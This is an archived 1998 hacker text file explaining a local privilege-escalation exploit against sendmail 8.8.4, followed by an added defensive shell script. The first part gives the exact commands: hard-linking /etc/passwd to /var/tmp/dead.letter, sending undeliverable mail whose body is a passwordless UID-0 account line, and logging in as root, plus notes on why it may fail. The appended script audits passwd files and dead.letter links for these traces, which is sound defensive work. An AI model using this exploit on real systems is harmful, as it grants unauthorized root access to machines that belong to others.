Text File | 1998-03-25 | 1KB | 36 lines
sendmail 8.8.4 exploit
"sendmail? 'tis the buggiest program" -phriend-
Ok, here's a brief and interesting explanation of this famous exploit. This
exploit uses sendmail version 8.8.4 and it requires that you have a shell
account on the server in question. The exploit creates a hard link from
/etc/passwd to /var/tmp/dead.letter. When the message below can't be
delivered, sendmail appends it to dead.letter, and through the link that
write lands in /etc/passwd. Very simple really. Here's how it works; below
are the exact commands as you have to type them (for the technically
challenged ones):
* ln /etc/passwd /var/tmp/dead.letter
* telnet target.host 25
* mail from: nonexsistent@not.an.actual.host.com
* rcpt to: nonexsistent@not.as.actual.host.com
* data
* lord::0:0:leet shit:/root:/bin/bash
* .
* quit
Kaboom, you're done. Telnet to port 23 and log in as lord, no password
required. Thanx to a little bit of work we did, lord just happens to have
the same privileges as root.
There are a couple of reasons why this might not work:
1. /var and / are different partitions (as you already know, you can't
   make hard links between different partitions)
2. There is a postmaster account or mail alias on the machine, in which
   case your mail will end up there instead of being written to
   /etc/passwd
3. /var/tmp doesn't exist or isn't publicly writable
Duncan Silver
www.hackersclub.com/uu
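
Added example, not part of the original text file: a shell check for the traces the steps above leave behind, namely a dead.letter that shares an inode with the passwd file (or has any extra hard link), and passwd lines that are malformed, carry UID 0 under a name other than root, or have an empty password field. The function names are hypothetical, and the paths are passed as arguments so the checks can run against copies or constructed fixtures.

```shell
#!/bin/sh
# Added defensive example; function names are hypothetical.

# Flag passwd lines that are malformed (not 7 colon-separated fields),
# have UID 0 without being "root", or have an empty password field.
audit_passwd() {
    awk -F: '
        /^#/ || /^$/ { next }
        NF != 7 { print "malformed:line " NR; next }
        $3 ~ /^[0-9]+$/ && $3 + 0 == 0 && $1 != "root" { print "uid0:" $1 }
        $2 == "" { print "nopass:" $1 }
    ' "$1"
}

# Succeed if FILE is a regular file with more than one hard link.
has_extra_links() {
    [ -n "$(find "$1" -type f -links +1 2>/dev/null)" ]
}

# Succeed if A and B both exist and are the same file (device and inode).
same_file() {
    [ -e "$1" ] && [ -e "$2" ] && [ "$1" -ef "$2" ]
}

# Report on a passwd file and a dead.letter path; return 1 on any finding.
audit_dead_letter() {
    passwd_file=$1
    dead_letter=$2
    rc=0
    findings=$(audit_passwd "$passwd_file")
    if [ -n "$findings" ]; then
        printf '%s\n' "$findings"
        rc=1
    fi
    if same_file "$passwd_file" "$dead_letter"; then
        echo "hardlink:$dead_letter is $passwd_file"
        rc=1
    elif has_extra_links "$dead_letter"; then
        echo "hardlink:$dead_letter has extra links"
        rc=1
    fi
    return $rc
}
```

On a live host the call would be audit_dead_letter /etc/passwd /var/tmp/dead.letter. Keeping /var/tmp on a different partition from / removes the hard-link precondition entirely, as item 1 of the list notes.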